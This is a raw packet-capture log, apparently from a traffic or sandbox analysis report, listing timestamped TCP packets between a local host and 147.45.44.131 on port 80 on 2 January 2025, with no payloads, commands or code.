Jan 2, 2025 19:14:16.080264091 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.080264091 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.080270052 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.080279112 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.080284119 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.080288887 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.080293894 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.080298901 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.080303907 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.080310106 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.080315113 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.080315113 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.080316067 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.080328941 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.080334902 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.080341101 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.080351114 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.080357075 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.080357075 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.080357075 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.080363035 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.080372095 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.080377102 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.080382109 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.080388069 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.080409050 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.080409050 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.080444098 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.080513954 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.081926107 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.082096100 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.082102060 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.082108021 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.082108974 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.082113981 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.082122087 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.082127094 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.082133055 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.082160950 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.082402945 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.121490002 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.121498108 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.121509075 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.121602058 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.121618986 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.121625900 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.121638060 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.121710062 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.121782064 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.121793985 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.121845007 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.159256935 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.159331083 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.159387112 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.159394026 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.159405947 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.159411907 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.159418106 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.159423113 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.159429073 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.159434080 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.159559965 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.159559965 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.159565926 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.159584999 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.159598112 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.159604073 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.159615993 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.159641981 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.159656048 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.159732103 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.159737110 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.159743071 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.159749031 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.159811974 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.159888983 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.159894943 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.159902096 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.159907103 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.159913063 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.159918070 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.159924030 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.159959078 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.159991980 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.160034895 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.160048008 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.160054922 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.160059929 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.160065889 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.160070896 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.160084009 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.160089970 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.160115957 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.160161972 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.160192966 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.160198927 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.160254955 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.160372019 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.160377979 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.160393953 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.160399914 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.160413027 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.160434008 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.160480022 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.160546064 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.160552025 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.160557985 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.160562992 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.160573006 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.160597086 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.160639048 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.160690069 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.160839081 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.160850048 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.160861969 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.160866976 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.160872936 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.160934925 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.160936117 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.160996914 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.161001921 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.161015034 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.161020041 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.161026001 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.161031008 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.161036968 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.161057949 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.161084890 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.161153078 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.161158085 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.161214113 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.161351919 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.161358118 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.161370039 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.161423922 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.161509037 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.161520004 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.161531925 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.161536932 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.161542892 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.161547899 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.161554098 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.161595106 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.161649942 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.161659956 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.161674023 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.161679983 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.161685944 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.161690950 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.161696911 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.161703110 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.161708117 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.161715031 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.161767960 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.161809921 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.161818027 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.161829948 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.161835909 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.161842108 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.161884069 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.161884069 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.161993980 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.162000895 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.162014008 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.162019968 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.162025928 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.162033081 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.162039042 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.162050009 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.162054062 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.162098885 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.162309885 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.162323952 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.162328959 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.162334919 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.162339926 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.162344933 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.162389040 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.162389040 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.162482977 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.162489891 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.162502050 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.162508011 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.162564039 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.168334007 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.168497086 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.168503046 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.168509960 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.168514967 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.168520927 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.168525934 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.168539047 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.168572903 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.205562115 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.205569029 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.205576897 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.205688953 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.205723047 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.205729961 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.205734968 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.205740929 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.205746889 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.205785036 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.205806017 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.245989084 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.245995045 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.246006966 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.246014118 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.246020079 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.246057987 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.246103048 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.246135950 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.246143103 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.246150017 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.246206999 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.246298075 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.246304989 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.246316910 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.246397972 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.246460915 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.246468067 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.246474981 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.246479988 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.246491909 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.246498108 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.246520042 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.246550083 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.246550083 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.246613026 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.246625900 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.246632099 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.246637106 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.246644020 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.246649027 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.246654987 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.246660948 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.246705055 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.246705055 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.246803999 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.246809959 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.246822119 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.246920109 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.246963978 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.246969938 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.246983051 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.246988058 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.247025967 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.247104883 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.247113943 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.247127056 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.247133017 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.247176886 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.247176886 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.247262001 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.247276068 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.247283936 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.247289896 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.247296095 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.247320890 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.247347116 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.247431993 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.247437954 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.247453928 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.247461081 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.247467041 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.247479916 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.247486115 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.247529030 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.247529030 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.247591972 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.247596979 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.247607946 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.247662067 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.247759104 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.247762918 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.247775078 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.247781038 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.247786999 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.247818947 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.247823954 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.247832060 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.247833967 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.247838974 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.247864962 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.247924089 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.248014927 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.248019934 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.248032093 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.248073101 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.248085976 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.248209000 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.248217106 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.248228073 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.248234034 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.248239040 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.248245001 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.248270988 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.248274088 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.248289108 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.248296022 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.248301983 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.248302937 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.248374939 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.248449087 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.248462915 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.248469114 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.248473883 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.248485088 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.248491049 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.248497963 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.248548985 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.248548985 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.248581886 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.248636007 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.248774052 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.248780012 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.248791933 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.248796940 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.248807907 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.248814106 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.248819113 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.248823881 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.248830080 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.248841047 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.248867035 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.248867035 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.248898029 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.248898029 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.249095917 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.249103069 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.249109030 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.249114037 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.249119997 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.249125004 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.249130964 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.249138117 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.249176025 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.249207973 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.249274015 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.249279976 CET	80	49721	147.45.44.131	192.168.2.5
